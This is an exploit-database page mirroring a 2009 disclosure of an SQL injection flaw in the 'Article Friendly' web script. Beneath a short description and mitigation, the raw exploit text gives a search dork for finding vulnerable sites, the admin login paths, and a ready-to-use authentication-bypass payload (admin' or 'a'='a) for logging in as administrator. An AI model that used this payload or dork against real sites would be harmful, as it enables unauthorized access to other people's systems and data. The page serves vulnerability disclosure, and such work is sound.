Article Friendly - exploit.company

vendor:

Article Friendly

by:

SkuLL-HacKeR

CVSS

HIGH

SQL Injection

CWE

Product Name: Article Friendly

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: MacBook & Windows XP SP3

2009

Article Friendly <= SQL Injection Vulnerability

Article Friendly is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to access or modify critical data, or even allow the execution of arbitrary code on the underlying server.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.

Source

Exploit-DB raw data:

#                           
#    _____ _    _  _   _     _            _  _    ___    ____  _     ___  _____
#   / ___/| |__ || || | |   | |          | || |  / _ \  /  __|| |__ / _ \| |_) |
#   (__  )| / / ||_|| | |__ | |__   ___  | __ | / ___ \ | |__ | / /|  __/|  _ < 
#  /____/ |_\_\ |___| |____||____| |___| |_||_|/_/   \_\\____||_\_\ \___||_| \_\ ..Bl4ck H4T..

============================================================================== 
        [!] Article Friendly <= SQL Injection Vulnerability 
==============================================================================


    
     # Author : SkuLL-HacKeR 
     # Site p4ge : http://www.articlefriendly.com/ 
     # # GreetZ : AmiZya - Stack - djekmani4ever
     # Dork : Powered by Article DashBoard #
     # Sh0w CreW : Jiko  HxH - THE SAD HACKER 
     # My Home: www.no-exploit.com & # wWw.Owned-m.CoM
     # T3st3d on: MacBook & Windows XP SP3

########################################################################### 

===[ #-/Expl0it Code\-# : ]=== 

# SQL Injection Vulnerability :

#-/ Link Admin: www.Target.com/[ScriptarticleLoser]/admin/

#-/ 0r : www.Target.com[Script-article-Loser]/admin/index.php?filename=adminlogin

#-/Username : admin' or 'a'='a

#-/Password : adminKas0l

###########################################################################